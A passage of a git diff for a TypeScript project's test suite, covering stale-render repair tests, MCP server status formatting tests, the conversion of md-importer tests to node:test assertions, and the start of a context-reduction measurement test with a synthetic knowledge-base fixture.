+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Stale Repair — Idempotency
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: repairStaleRenders idempotency — fully synced returns 0 ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice', status: 'pending' });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Task', status: 'done' });
+
+    // Write plan with T01 checked — matches DB
+    const planContent = makePlanContent('S01', [
+      { id: 'T01', title: 'Task', done: true },
+    ]);
+    const planPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md');
+    fs.writeFileSync(planPath, planContent);
+    clearAllCaches();
+
+    // No stale entries when everything is in sync (no summary to check since no fullSummaryMd)
+    const repaired = await repairStaleRenders(tmpDir);
+    assert.deepStrictEqual(repaired, 0, 'repairStaleRenders should return 0 on fully synced project');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Stale Detection — Missing Slice Summary + UAT
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: detectStaleRenders finds missing slice summary and UAT ──', () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice', status: 'pending' });
+
+    // Update slice to complete with content via raw adapter
+    const adapter = _getAdapter()!;
+    adapter.prepare(
+      `UPDATE slices SET status = 'complete', full_summary_md = :sm, full_uat_md = :um WHERE milestone_id = 'M001' AND id = 'S01'`,
+    ).run({
+      ':sm': '---\nid: S01\nparent: M001\nmilestone: M001\n---\n\n# S01: Summary\n\nDone.\n',
+      ':um': '# S01 UAT\n\nAll pass.\n',
+    });
+
+    clearAllCaches();
+
+    const stale = detectStaleRenders(tmpDir);
+    const summaryStale = stale.find(s => s.reason.includes('SUMMARY.md missing') && s.reason.includes('S01'));
+    const uatStale = stale.find(s => s.reason.includes('UAT.md missing') && s.reason.includes('S01'));
+
+    assert.ok(!!summaryStale, 'should detect missing S01-SUMMARY.md');
+    assert.ok(!!uatStale, 'should detect missing S01-UAT.md');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+
diff --git a/src/resources/extensions/gsd/tests/mcp-status.test.ts b/src/resources/extensions/gsd/tests/mcp-status.test.ts
new file mode 100644
index 000000000..97258fb2b
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/mcp-status.test.ts
@@ -0,0 +1,103 @@
+import test, { describe } from "node:test";
+import assert from "node:assert/strict";
+
+import {
+  formatMcpStatusReport,
+  formatMcpServerDetail,
+  type McpServerStatus,
+} from "../commands-mcp-status.ts";
+
+// ─── formatMcpStatusReport ──────────────────────────────────────────────────
+
+describe("formatMcpStatusReport", () => {
+  test("returns no-servers message when list is empty", () => {
+    const result = formatMcpStatusReport([]);
+    assert.match(result, /no mcp servers configured/i);
+  });
+
+  test("lists all servers with connection status", () => {
+    const servers: McpServerStatus[] = [
+      { name: "railway", transport: "stdio", connected: true, toolCount: 5, error: undefined },
+      { name: "linear", transport: "http", connected: false, toolCount: 0, error: undefined },
+    ];
+    const result = formatMcpStatusReport(servers);
+    assert.match(result, /railway/);
+    assert.match(result, /linear/);
+    assert.match(result, /connected/i);
+    assert.match(result, /disconnected/i);
+    assert.match(result, /5 tools/);
+  });
+
+  test("shows error state for servers with errors", () => {
+    const servers: McpServerStatus[] = [
+      { name: "broken", transport: "stdio", connected: false, toolCount: 0, error: "Connection refused" },
+    ];
+    const result = formatMcpStatusReport(servers);
+    assert.match(result, /error/i);
+    assert.match(result, /Connection refused/);
+  });
+
+  test("includes server count in header", () => {
+    const servers: McpServerStatus[] = [
+      { name: "a", transport: "stdio", connected: true, toolCount: 3, error: undefined },
+      { name: "b", transport: "http", connected: true, toolCount: 2, error: undefined },
+    ];
+    const result = formatMcpStatusReport(servers);
+    assert.match(result, /2/);
+  });
+});
+
+// ─── formatMcpServerDetail ──────────────────────────────────────────────────
+
+describe("formatMcpServerDetail", () => {
+  test("shows server name and transport", () => {
+    const result = formatMcpServerDetail({
+      name: "railway",
+      transport: "stdio",
+      connected: true,
+      toolCount: 3,
+      tools: ["railway_list_projects", "railway_deploy", "railway_logs"],
+      error: undefined,
+    });
+    assert.match(result, /railway/);
+    assert.match(result, /stdio/);
+  });
+
+  test("lists individual tools when available", () => {
+    const result = formatMcpServerDetail({
+      name: "railway",
+      transport: "stdio",
+      connected: true,
+      toolCount: 2,
+      tools: ["railway_list_projects", "railway_deploy"],
+      error: undefined,
+    });
+    assert.match(result, /railway_list_projects/);
+    assert.match(result, /railway_deploy/);
+  });
+
+  test("shows error message for failed servers", () => {
+    const result = formatMcpServerDetail({
+      name: "broken",
+      transport: "stdio",
+      connected: false,
+      toolCount: 0,
+      tools: [],
+      error: "spawn ENOENT",
+    });
+    assert.match(result, /error/i);
+    assert.match(result, /spawn ENOENT/);
+  });
+
+  test("shows disconnected status with no tools", () => {
+    const result = formatMcpServerDetail({
+      name: "offline",
+      transport: "http",
+      connected: false,
+      toolCount: 0,
+      tools: [],
+      error: undefined,
+    });
+    assert.match(result, /disconnected/i);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/md-importer.test.ts b/src/resources/extensions/gsd/tests/md-importer.test.ts
index c8de88c0a..e1b622615 100644
--- a/src/resources/extensions/gsd/tests/md-importer.test.ts
+++ b/src/resources/extensions/gsd/tests/md-importer.test.ts
@@ -1,4 +1,3 @@
-import { createTestContext } from './test-helpers.ts';
 import * as fs from 'node:fs';
 import * as path from 'node:path';
 import * as os from 'node:os';
@@ -17,8 +16,8 @@ import {
   parseRequirementsSections,
   migrateFromMarkdown,
 } from '../md-importer.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Fixtures
@@ -135,43 +134,37 @@ function cleanupDir(dir: string): void {
 // md-importer: parseDecisionsTable
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== md-importer: parseDecisionsTable ===');
-
-{
+test('md-importer: parseDecisionsTable', () => {
   const decisions = parseDecisionsTable(DECISIONS_MD);
-  assertEq(decisions.length, 4, 'should parse 4 decisions');
-  assertEq(decisions[0].id, 'D001', 'first decision should be D001');
-  assertEq(decisions[0].decision, 'SQLite library', 'D001 decision text');
-  assertEq(decisions[0].choice, 'better-sqlite3', 'D001 choice');
-  assertEq(decisions[0].scope, 'library', 'D001 scope');
-  assertEq(decisions[0].revisable, 'No', 'D001 revisable');
-}
+  assert.deepStrictEqual(decisions.length, 4, 'should parse 4 decisions');
+  assert.deepStrictEqual(decisions[0].id, 'D001', 'first decision should be D001');
+  assert.deepStrictEqual(decisions[0].decision, 'SQLite library', 'D001 decision text');
+  assert.deepStrictEqual(decisions[0].choice, 'better-sqlite3', 'D001 choice');
+  assert.deepStrictEqual(decisions[0].scope, 'library', 'D001 scope');
+  assert.deepStrictEqual(decisions[0].revisable, 'No', 'D001 revisable');
+});
 
-console.log('=== md-importer: supersession detection ===');
-
-{
+test('md-importer: supersession detection', () => {
   const decisions = parseDecisionsTable(DECISIONS_MD);
 
   // D010 amends D001 → D001.superseded_by = D010
   const d001 = decisions.find(d => d.id === 'D001');
-  assertEq(d001?.superseded_by, 'D010', 'D001 should be superseded by D010');
+  assert.deepStrictEqual(d001?.superseded_by, 'D010', 'D001 should be superseded by D010');
 
   // D020 amends D010 → D010.superseded_by = D020
   const d010 = decisions.find(d => d.id === 'D010');
-  assertEq(d010?.superseded_by, 'D020', 'D010 should be superseded by D020');
+  assert.deepStrictEqual(d010?.superseded_by, 'D020', 'D010 should be superseded by D020');
 
   // D002 is not amended
   const d002 = decisions.find(d => d.id === 'D002');
-  assertEq(d002?.superseded_by, null, 'D002 should not be superseded');
+  assert.deepStrictEqual(d002?.superseded_by, null, 'D002 should not be superseded');
 
   // D020 is the latest in chain, not superseded
   const d020 = decisions.find(d => d.id === 'D020');
-  assertEq(d020?.superseded_by, null, 'D020 should not be superseded');
-}
+  assert.deepStrictEqual(d020?.superseded_by, null, 'D020 should not be superseded');
+});
 
-console.log('=== md-importer: malformed/empty rows skipped ===');
-
-{
+test('md-importer: malformed/empty rows skipped', () => {
   const malformedInput = `# Decisions
 
 | # | When | Scope | Decision | Choice | Rationale | Revisable? |
@@ -182,24 +175,20 @@ console.log('=== md-importer: malformed/empty rows skipped ===');
 | D003 | M001 | arch | Config | JSON | Simple | Yes |
 `;
   const decisions = parseDecisionsTable(malformedInput);
-  assertEq(decisions.length, 2, 'should skip rows without D-prefix IDs');
-  assertEq(decisions[0].id, 'D001', 'first valid row');
-  assertEq(decisions[1].id, 'D003', 'second valid row (skipping malformed)');
-}
+  assert.deepStrictEqual(decisions.length, 2, 'should skip rows without D-prefix IDs');
+  assert.deepStrictEqual(decisions[0].id, 'D001', 'first valid row');
+  assert.deepStrictEqual(decisions[1].id, 'D003', 'second valid row (skipping malformed)');
+});
 
-console.log('=== md-importer: made_by backward compatibility (old 7-column format) ===');
-
-{
+test('md-importer: made_by backward compatibility (old 7-column format)', () => {
   const decisions = parseDecisionsTable(DECISIONS_MD);
   // Old format has no Made By column — should default to 'agent'
   for (const d of decisions) {
-    assertEq(d.made_by, 'agent', `${d.id} made_by defaults to agent for legacy format`);
+    assert.deepStrictEqual(d.made_by, 'agent', `${d.id} made_by defaults to agent for legacy format`);
   }
-}
+});
 
-console.log('=== md-importer: made_by column parsing (new 8-column format) ===');
-
-{
+test('md-importer: made_by column parsing (new 8-column format)', () => {
   const newFormatMd = `# Decisions Register
 
 | # | When | Scope | Decision | Choice | Rationale | Revisable? | Made By |
@@ -210,62 +199,58 @@ console.log('=== md-importer: made_by column parsing (new 8-column format) ===')
 | D004 | M002 | impl | Cache strategy | LRU | Predictable | No | bogus |
 `;
   const decisions = parseDecisionsTable(newFormatMd);
-  assertEq(decisions.length, 4, 'should parse 4 decisions with new format');
-  assertEq(decisions[0].made_by, 'human', 'D001 made_by = human');
-  assertEq(decisions[1].made_by, 'agent', 'D002 made_by = agent');
-  assertEq(decisions[2].made_by, 'collaborative', 'D003 made_by = collaborative');
-  assertEq(decisions[3].made_by, 'agent', 'D004 invalid made_by defaults to agent');
-}
+  assert.deepStrictEqual(decisions.length, 4, 'should parse 4 decisions with new format');
+  assert.deepStrictEqual(decisions[0].made_by, 'human', 'D001 made_by = human');
+  assert.deepStrictEqual(decisions[1].made_by, 'agent', 'D002 made_by = agent');
+  assert.deepStrictEqual(decisions[2].made_by, 'collaborative', 'D003 made_by = collaborative');
+  assert.deepStrictEqual(decisions[3].made_by, 'agent', 'D004 invalid made_by defaults to agent');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // md-importer: parseRequirementsSections
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('=== md-importer: parseRequirementsSections ===');
-
-{
+test('md-importer: parseRequirementsSections', () => {
   const reqs = parseRequirementsSections(REQUIREMENTS_MD);
-  assertEq(reqs.length, 5, 'should parse 5 unique requirements');
+  assert.deepStrictEqual(reqs.length, 5, 'should parse 5 unique requirements');
 
   const r001 = reqs.find(r => r.id === 'R001');
-  assertTrue(!!r001, 'R001 should exist');
-  assertEq(r001?.class, 'core-capability', 'R001 class');
-  assertEq(r001?.status, 'active', 'R001 status');
-  assertEq(r001?.description, 'A SQLite database with typed wrappers', 'R001 description');
-  assertEq(r001?.why, 'Foundation for storage', 'R001 why');
-  assertEq(r001?.source, 'user', 'R001 source');
-  assertEq(r001?.primary_owner, 'M001/S01', 'R001 primary_owner');
-  assertEq(r001?.supporting_slices, 'none', 'R001 supporting_slices');
-  assertEq(r001?.validation, 'unmapped', 'R001 validation');
-  assertEq(r001?.notes, 'WAL mode enabled', 'R001 notes');
-  assertTrue(r001?.full_content?.includes('### R001') ?? false, 'R001 full_content should have heading');
+  assert.ok(!!r001, 'R001 should exist');
+  assert.deepStrictEqual(r001?.class, 'core-capability', 'R001 class');
+  assert.deepStrictEqual(r001?.status, 'active', 'R001 status');
+  assert.deepStrictEqual(r001?.description, 'A SQLite database with typed wrappers', 'R001 description');
+  assert.deepStrictEqual(r001?.why, 'Foundation for storage', 'R001 why');
+  assert.deepStrictEqual(r001?.source, 'user', 'R001 source');
+  assert.deepStrictEqual(r001?.primary_owner, 'M001/S01', 'R001 primary_owner');
+  assert.deepStrictEqual(r001?.supporting_slices, 'none', 'R001 supporting_slices');
+  assert.deepStrictEqual(r001?.validation, 'unmapped', 'R001 validation');
+  assert.deepStrictEqual(r001?.notes, 'WAL mode enabled', 'R001 notes');
+  assert.ok(r001?.full_content?.includes('### R001') ?? false, 'R001 full_content should have heading');
 
   // Validated section — R017 (abbreviated format with "Validated by" / "Proof" bullets)
   const r017 = reqs.find(r => r.id === 'R017');
-  assertTrue(!!r017, 'R017 should exist');
-  assertEq(r017?.status, 'validated', 'R017 status from validated section');
-  assertEq(r017?.validation, 'M001/S01', 'R017 validation (from "Validated by" bullet)');
-  assertEq(r017?.notes, '50 decisions queried in 0.62ms', 'R017 notes (from "Proof" bullet)');
+  assert.ok(!!r017, 'R017 should exist');
+  assert.deepStrictEqual(r017?.status, 'validated', 'R017 status from validated section');
+  assert.deepStrictEqual(r017?.validation, 'M001/S01', 'R017 validation (from "Validated by" bullet)');
+  assert.deepStrictEqual(r017?.notes, '50 decisions queried in 0.62ms', 'R017 notes (from "Proof" bullet)');
 
   // Deferred requirement
   const r030 = reqs.find(r => r.id === 'R030');
-  assertEq(r030?.status, 'deferred', 'R030 status should be deferred');
-  assertEq(r030?.class, 'differentiator', 'R030 class');
-  assertEq(r030?.description, 'Rust crate for embeddings', 'R030 description');
+  assert.deepStrictEqual(r030?.status, 'deferred', 'R030 status should be deferred');
+  assert.deepStrictEqual(r030?.class, 'differentiator', 'R030 class');
+  assert.deepStrictEqual(r030?.description, 'Rust crate for embeddings', 'R030 description');
 
   // Out of scope
   const r040 = reqs.find(r => r.id === 'R040');
-  assertEq(r040?.status, 'out-of-scope', 'R040 status should be out-of-scope');
-  assertEq(r040?.class, 'anti-feature', 'R040 class');
-}
+  assert.deepStrictEqual(r040?.status, 'out-of-scope', 'R040 status should be out-of-scope');
+  assert.deepStrictEqual(r040?.class, 'anti-feature', 'R040 class');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // md-importer: migrateFromMarkdown orchestrator
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('=== md-importer: migrateFromMarkdown orchestrator ===');
-
-{
+test('md-importer: migrateFromMarkdown orchestrator', () => {
   const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-import-test-'));
   createFixtureTree(tmpDir);
 
@@ -273,53 +258,51 @@ console.log('=== md-importer: migrateFromMarkdown orchestrator ===');
     openDatabase(':memory:');
     const result = migrateFromMarkdown(tmpDir);
 
-    assertEq(result.decisions, 4, 'should import 4 decisions');
-    assertEq(result.requirements, 5, 'should import 5 requirements');
-    assertTrue(result.artifacts > 0, 'should import some artifacts');
+    assert.deepStrictEqual(result.decisions, 4, 'should import 4 decisions');
+    assert.deepStrictEqual(result.requirements, 5, 'should import 5 requirements');
+    assert.ok(result.artifacts > 0, 'should import some artifacts');
 
     // Verify decisions queryable
     const d001 = getDecisionById('D001');
-    assertTrue(!!d001, 'D001 should be queryable');
-    assertEq(d001?.superseded_by, 'D010', 'D001 superseded_by should be D010');
+    assert.ok(!!d001, 'D001 should be queryable');
+    assert.deepStrictEqual(d001?.superseded_by, 'D010', 'D001 superseded_by should be D010');
 
     // Verify requirements queryable
     const r001 = getRequirementById('R001');
-    assertTrue(!!r001, 'R001 should be queryable');
-    assertEq(r001?.status, 'active', 'R001 status from DB');
+    assert.ok(!!r001, 'R001 should be queryable');
+    assert.deepStrictEqual(r001?.status, 'active', 'R001 status from DB');
 
     // Verify active views
     const activeD = getActiveDecisions();
-    assertEq(activeD.length, 2, 'should have 2 active decisions (D002, D020)');
+    assert.deepStrictEqual(activeD.length, 2, 'should have 2 active decisions (D002, D020)');
 
     // Verify artifacts table
     const adapter = _getAdapter();
     const artifacts = adapter?.prepare('SELECT count(*) as c FROM artifacts').get();
-    assertTrue((artifacts?.c as number) > 0, 'artifacts table should have rows');
+    assert.ok((artifacts?.c as number) > 0, 'artifacts table should have rows');
 
     // Verify hierarchy correctness
     const roadmap = adapter?.prepare('SELECT * FROM artifacts WHERE artifact_type = :type').get({ ':type': 'ROADMAP' });
-    assertTrue(!!roadmap, 'ROADMAP artifact should exist');
-    assertEq(roadmap?.milestone_id, 'M001', 'ROADMAP should be in M001');
+    assert.ok(!!roadmap, 'ROADMAP artifact should exist');
+    assert.deepStrictEqual(roadmap?.milestone_id, 'M001', 'ROADMAP should be in M001');
 
     const taskPlan = adapter?.prepare('SELECT * FROM artifacts WHERE task_id = :taskId AND artifact_type = :type').get({
       ':taskId': 'T01',
       ':type': 'PLAN',
     });
-    assertTrue(!!taskPlan, 'T01-PLAN artifact should exist');
+    assert.ok(!!taskPlan, 'T01-PLAN artifact should exist');
 
     closeDatabase();
   } finally {
     cleanupDir(tmpDir);
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // md-importer: idempotent re-import
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('=== md-importer: idempotent re-import ===');
-
-{
+test('md-importer: idempotent re-import', () => {
   const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-idemp-test-'));
   createFixtureTree(tmpDir);
 
@@ -328,9 +311,9 @@ console.log('=== md-importer: idempotent re-import ===');
     const r1 = migrateFromMarkdown(tmpDir);
     const r2 = migrateFromMarkdown(tmpDir);
 
-    assertEq(r1.decisions, r2.decisions, 'double import should produce same decision count');
-    assertEq(r1.requirements, r2.requirements, 'double import should produce same requirement count');
-    assertEq(r1.artifacts, r2.artifacts, 'double import should produce same artifact count');
+    assert.deepStrictEqual(r1.decisions, r2.decisions, 'double import should produce same decision count');
+    assert.deepStrictEqual(r1.requirements, r2.requirements, 'double import should produce same requirement count');
+    assert.deepStrictEqual(r1.artifacts, r2.artifacts, 'double import should produce same artifact count');
 
     // Verify no duplicates
     const adapter = _getAdapter();
@@ -338,23 +321,21 @@ console.log('=== md-importer: idempotent re-import ===');
     const rc = adapter?.prepare('SELECT count(*) as c FROM requirements').get()?.c as number;
     const ac = adapter?.prepare('SELECT count(*) as c FROM artifacts').get()?.c as number;
 
-    assertEq(dc, r1.decisions, 'DB decision count matches import count');
-    assertEq(rc, r1.requirements, 'DB requirement count matches import count');
-    assertEq(ac, r1.artifacts, 'DB artifact count matches import count');
+    assert.deepStrictEqual(dc, r1.decisions, 'DB decision count matches import count');
+    assert.deepStrictEqual(rc, r1.requirements, 'DB requirement count matches import count');
+    assert.deepStrictEqual(ac, r1.artifacts, 'DB artifact count matches import count');
 
     closeDatabase();
   } finally {
     cleanupDir(tmpDir);
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // md-importer: missing file graceful handling
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('=== md-importer: missing file handling ===');
-
-{
+test('md-importer: missing file handling', () => {
   const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-empty-test-'));
   // Create empty .gsd/ with no files
   fs.mkdirSync(path.join(tmpDir, '.gsd'), { recursive: true });
@@ -363,43 +344,39 @@ console.log('=== md-importer: missing file handling ===');
     openDatabase(':memory:');
     const result = migrateFromMarkdown(tmpDir);
 
-    assertEq(result.decisions, 0, 'missing DECISIONS.md → 0 decisions');
-    assertEq(result.requirements, 0, 'missing REQUIREMENTS.md → 0 requirements');
-    assertEq(result.artifacts, 0, 'empty tree → 0 artifacts');
+    assert.deepStrictEqual(result.decisions, 0, 'missing DECISIONS.md → 0 decisions');
+    assert.deepStrictEqual(result.requirements, 0, 'missing REQUIREMENTS.md → 0 requirements');
+    assert.deepStrictEqual(result.artifacts, 0, 'empty tree → 0 artifacts');
 
     closeDatabase();
   } finally {
     cleanupDir(tmpDir);
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // md-importer: schema v1→v2 migration on existing DBs
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('=== md-importer: schema v1→v2 migration ===');
-
-{
+test('md-importer: schema v1→v2 migration', () => {
   // This test verifies that opening a fresh DB auto-migrates to current schema version
   openDatabase(':memory:');
   const adapter = _getAdapter();
   const version = adapter?.prepare('SELECT MAX(version) as v FROM schema_version').get();
-  assertEq(version?.v, 4, 'new DB should be at schema version 4');
+  assert.deepStrictEqual(version?.v, 14, 'new DB should be at schema version 14');
 
   // Artifacts table should exist
   const tableCheck = adapter?.prepare("SELECT count(*) as c FROM sqlite_master WHERE type='table' AND name='artifacts'").get();
-  assertEq(tableCheck?.c, 1, 'artifacts table should exist');
+  assert.deepStrictEqual(tableCheck?.c, 1, 'artifacts table should exist');
 
   closeDatabase();
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // md-importer: round-trip fidelity
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('=== md-importer: round-trip fidelity ===');
-
-{
+test('md-importer: round-trip fidelity', () => {
   const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-roundtrip-test-'));
   createFixtureTree(tmpDir);
 
@@ -409,32 +386,31 @@ console.log('=== md-importer: round-trip fidelity ===');
 
     // Round-trip: verify imported field values match source
     const d002 = getDecisionById('D002');
-    assertEq(d002?.when_context, 'M001', 'D002 when_context round-trip');
-    assertEq(d002?.scope, 'arch', 'D002 scope round-trip');
-    assertEq(d002?.decision, 'DB location', 'D002 decision round-trip');
-    assertEq(d002?.choice, '.gsd/gsd.db', 'D002 choice round-trip');
-    assertEq(d002?.rationale, 'Derived state', 'D002 rationale round-trip');
+    assert.deepStrictEqual(d002?.when_context, 'M001', 'D002 when_context round-trip');
+    assert.deepStrictEqual(d002?.scope, 'arch', 'D002 scope round-trip');
+    assert.deepStrictEqual(d002?.decision, 'DB location', 'D002 decision round-trip');
+    assert.deepStrictEqual(d002?.choice, '.gsd/gsd.db', 'D002 choice round-trip');
+    assert.deepStrictEqual(d002?.rationale, 'Derived state', 'D002 rationale round-trip');
 
     const r002 = getRequirementById('R002');
-    assertEq(r002?.class, 'failure-visibility', 'R002 class round-trip');
-    assertEq(r002?.description, 'Falls back to markdown if SQLite unavailable', 'R002 description round-trip');
-    assertEq(r002?.why, 'Must not break on exotic platforms', 'R002 why round-trip');
-    assertEq(r002?.primary_owner, 'M001/S01', 'R002 primary_owner round-trip');
-    assertEq(r002?.supporting_slices, 'M001/S03', 'R002 supporting_slices round-trip');
-    assertEq(r002?.notes, 'Transparent fallback', 'R002 notes round-trip');
-    assertEq(r002?.validation, 'unmapped', 'R002 validation round-trip');
+    assert.deepStrictEqual(r002?.class, 'failure-visibility', 'R002 class round-trip');
+    assert.deepStrictEqual(r002?.description, 'Falls back to markdown if SQLite unavailable', 'R002 description round-trip');
+    assert.deepStrictEqual(r002?.why, 'Must not break on exotic platforms', 'R002 why round-trip');
+    assert.deepStrictEqual(r002?.primary_owner, 'M001/S01', 'R002 primary_owner round-trip');
+    assert.deepStrictEqual(r002?.supporting_slices, 'M001/S03', 'R002 supporting_slices round-trip');
+    assert.deepStrictEqual(r002?.notes, 'Transparent fallback', 'R002 notes round-trip');
+    assert.deepStrictEqual(r002?.validation, 'unmapped', 'R002 validation round-trip');
 
     // Verify artifact content is stored
     const adapter = _getAdapter();
     const project = adapter?.prepare("SELECT * FROM artifacts WHERE path = :path").get({ ':path': 'PROJECT.md' });
-    assertTrue((project?.full_content as string)?.includes('Test Project'), 'PROJECT.md content round-trip');
+    assert.ok((project?.full_content as string)?.includes('Test Project'), 'PROJECT.md content round-trip');
 
     closeDatabase();
   } finally {
     cleanupDir(tmpDir);
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 
-report();
diff --git a/src/resources/extensions/gsd/tests/measurement.test.ts b/src/resources/extensions/gsd/tests/measurement.test.ts
new file mode 100644
index 000000000..25785d10f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/measurement.test.ts
@@ -0,0 +1,531 @@
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import {
+  queryKnowledge,
+  formatRoadmapExcerpt,
+} from '../context-store.ts';
+
+// ═══════════════════════════════════════════════════════════════════════════
+// measurement.test.ts — Verify ≥40% context reduction from scoped injection
+//
+// Tests queryKnowledge() and formatRoadmapExcerpt() with realistic synthetic
+// fixtures to confirm the context reduction target is met.
+// ═══════════════════════════════════════════════════════════════════════════
+
+// ─── Synthetic KNOWLEDGE.md Fixture (~8KB, 9 H2 sections) ──────────────────
+
+const syntheticKnowledge = `# Project Knowledge Base
+
+## Database Patterns
+SQLite is the primary persistence layer, using WAL mode for concurrent reads.
+All queries use prepared statements for SQL injection prevention.
+Connection pooling is handled by better-sqlite3's synchronous API.
+Schema migrations are versioned and applied at startup.
+
+Example patterns:
+- Use transactions for multi-statement operations
+- Prefer RETURNING clause for insert/update
+- Index foreign keys for join performance
+- Use CHECK constraints for data validation
+
+Performance considerations:
+- WAL checkpoint every 1000 writes
+- Vacuum on shutdown for space reclamation
+- Page size 4096 for SSD optimization
+
+Database schema evolution:
+- Migrations stored in migrations/ directory
+- Each migration has up/down scripts
+- Version table tracks applied migrations
+- Rollback supported for last N migrations
+
+Connection management:
+- Single connection for write operations
+- Read connections pooled for concurrency
+- Connection timeout set to 5 seconds
+- Busy timeout handles lock contention
+
+Query patterns:
+- Use prepared statements for parameterization
+- Batch inserts via INSERT ... VALUES syntax
+- Upserts via INSERT OR REPLACE
+- Pagination via LIMIT/OFFSET or cursor
+
+## API Design Principles
+REST endpoints follow OpenAPI 3.0 specification.
+Versioned paths use /v1/resource pattern.
+Authentication uses Bearer tokens in Authorization header.
+Rate limiting applies per-client with sliding window algorithm.
+
+Response formats:
+- Success: { data: T, meta?: { pagination } }
+- Error: { error: { code, message, details? } }
+- Pagination: cursor-based for large collections
+
+Content negotiation:
+- Accept: application/json (default)
+- Accept: text/plain (for CLI consumers)
+- Accept: text/event-stream (for SSE endpoints)
+
+API versioning strategy:
+- Major versions in URL path (/v1, /v2)
+- Minor versions via Accept-Version header
+- Deprecation warnings in response headers
+- 12-month sunset period for old versions
+
+Endpoint naming conventions:
+- Nouns for resources (users, projects)
+- Verbs only for non-CRUD actions (login, export)
+- Plural form for collections
+- Singular for singletons (me, config)
+
+HTTP method semantics:
+- GET: read-only, cacheable
+- POST: create or non-idempotent action
+- PUT: full replacement
+- PATCH: partial update
+- DELETE: remove resource
+
+## Testing Strategy
+Unit tests use node:test with strict assertions.
+Integration tests mock external services via msw.
+E2E tests use Playwright for browser automation.
+Test coverage target is 80% line coverage.
+
+Test organization:
+- Unit tests adjacent to source files (*.test.ts)
+- Integration tests in __tests__/integration/
+- E2E tests in e2e/ directory
+- Fixtures in __fixtures__/ subdirectories
+
+Mocking guidelines:
+- Prefer dependency injection over global mocks
+- Use vi.mock() sparingly, only for ES module boundaries
+- Reset mocks in afterEach hooks
+
+Test data management:
+- Factories generate realistic test data
+- Seeds populate database for integration tests
+- Snapshots capture expected output
+- Golden files for complex comparisons
+
+Assertion patterns:
+- Use strict equality for primitives
+- Deep equality for objects/arrays
+- Regex matching for dynamic content
+- Snapshot testing for UI components
+
+Test isolation:
+- Each test gets fresh database state
+- Environment variables reset between tests
+- File system operations use temp directories
+- Network calls intercepted by mock server
+
+## Error Handling
+Errors are typed using discriminated unions.
+Application errors extend BaseError class.
+HTTP errors map to standard status codes.
+Unhandled rejections trigger graceful shutdown.
+
+Error codes follow domain prefixes:
+- AUTH_xxx: Authentication/authorization errors
+- DB_xxx: Database operation failures
+- NET_xxx: Network/external service errors
+- VAL_xxx: Validation errors
+
+Logging integration:
+- Error instances auto-serialize to JSON
+- Stack traces included in development
+- Correlation IDs propagate through request chain
+
+Error recovery strategies:
+- Retry with exponential backoff for transient errors
+- Circuit breaker for external service failures
+- Fallback values for non-critical operations
+- Graceful degradation for partial failures
+
+User-facing error messages:
+- Generic messages for security-sensitive errors
+- Actionable guidance for recoverable errors
+- Reference codes for support escalation
+- Localized messages via i18n
+
+Error boundary patterns:
+- Component-level boundaries in UI
+- Route-level error handlers in API
+- Global unhandled rejection handlers
+- Process-level crash recovery
+
+## Observability Patterns
+Structured logging uses pino with JSON output.
+Metrics collected via OpenTelemetry SDK.
+Traces propagate context through async boundaries.
+Health checks exposed at /health and /ready endpoints.
+
+Log levels:
+- ERROR: Unrecoverable failures
+- WARN: Degraded operation
+- INFO: Significant state changes
+- DEBUG: Detailed diagnostic data
+
+Metric types:
+- Counters for request counts
+- Histograms for latency distribution
+- Gauges for resource utilization
+
+Trace context propagation:
+- W3C Trace Context headers
+- Baggage for cross-service metadata
+- Span attributes for searchability
+- Events for significant moments
+
+Dashboard design:
+- SLO dashboards for reliability
+- Request flow visualization
+- Error rate trends
+- Resource saturation alerts
+
+Alerting strategy:
+- Page for customer-impacting issues
+- Ticket for degraded performance
+- Notification for capacity planning
+- Silence during maintenance windows
+
